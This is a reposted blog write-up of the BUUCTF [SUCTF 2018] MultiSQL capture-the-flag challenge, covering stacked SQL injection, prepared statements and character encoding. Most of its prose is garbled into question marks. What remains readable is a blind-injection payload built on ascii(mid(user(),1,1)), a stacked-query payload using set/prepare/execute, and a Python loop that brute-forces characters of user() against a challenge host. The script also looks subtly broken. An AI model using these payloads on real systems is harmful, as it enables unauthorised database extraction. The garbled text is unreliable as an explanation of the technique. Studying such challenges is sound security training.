博客
关于我
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
阅读量:404 次
发布时间:2019-03-05

本文共 1744 字,大约阅读时间需要 5 分钟。

SQL???Web????

????????????????SQL???????????????????????????????????????????????????????????????????????????????????

?????

???????????SQL?????????????????????????????????????????????????????????????????@???union?select????????????

??????????????SQL???

2^(if(ascii(mid(user(),1,1))>0,0,1))

??????????????????????????0??????????????????????0?????0????????1???????????????????????

?????????????????????????????????????????????WordPress?WP????????

???????

?????????????????????????SQL??????????500????????????????????????????????????cookie?????????

??????????????????????????????

? id=2; set @sql = char(12, 324, 23, 23, ); prepare query from @sql; execute query;

?????????????????????SQL???

??????????????????????????????mid???????ascii?????????????????????

????WordPress

???????????WordPress???????????????????????????????????????????

???user.php????????????????id????????????????????

if (ascii(mid(user(),1,1)) > 0, 0, 1)

???????????????????????

?????????????????

1^

??????????????????????????????

??????????????????????????

  • ??id???????????
  • ??if??????????
  • ??1^???????????
  • ?????????????Python??????????????????????

    for i in range(1,15):    for j in range(50,155):        url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),{},1))={})'''.format(i,j)        cookie = { "PHPSESSID":"514gsk3jr3pf1ubri65d5pr714"}        res = requests.get(url=url, cookies=cookie)        content = re.findall('

    .*

    ', res.text, re.M|re.I) if ("admin" not in content[0]): database += chr(j) break

    ??????????????????id?username???????????????????

    ?????????????????????????????????????????????????flag???????????????

    ?????SQL????????????????????????????????????????????????????????????????

    转载地址:http://ykgg.baihongyu.com/

    你可能感兴趣的文章
    php实现多个一维数组对应合并成二维数组
    查看>>
    php实现多关键字查找方法
    查看>>
    PHP实现微信公众号H5支付
    查看>>
    PHP实现微信公众号网页授权
    查看>>
    PHP实现微信小程序推送消息至公众号
    查看>>
    php实现根据身份证获取年龄
    查看>>
    PHP实现的MongoDB数据增删改查
    查看>>
    RabbitMQ连接报错(1)—— None of the specified endpoints were reachable
    查看>>
    php实现逆转数组
    查看>>
    PHP实现页面静态化、纯静态化及伪静态化
    查看>>
    PHP对表单提交特殊字符的过滤和处理
    查看>>
    php对象引用和析构函数的关系
    查看>>
    RabbitMQ HTTP 认证后端项目常见问题解决方案
    查看>>
    PHP将图片转换成base64格式(优缺点)
    查看>>
    php将多个值的数组去除重复元素
    查看>>
    php局域网上传文件_PHP如何通过CURL上传文件
    查看>>
    PHP工具插件大全
    查看>>
    php布尔值的++
    查看>>
    PHP常量、变量作用域详解(一)
    查看>>
    PHP应用目录结构设计
    查看>>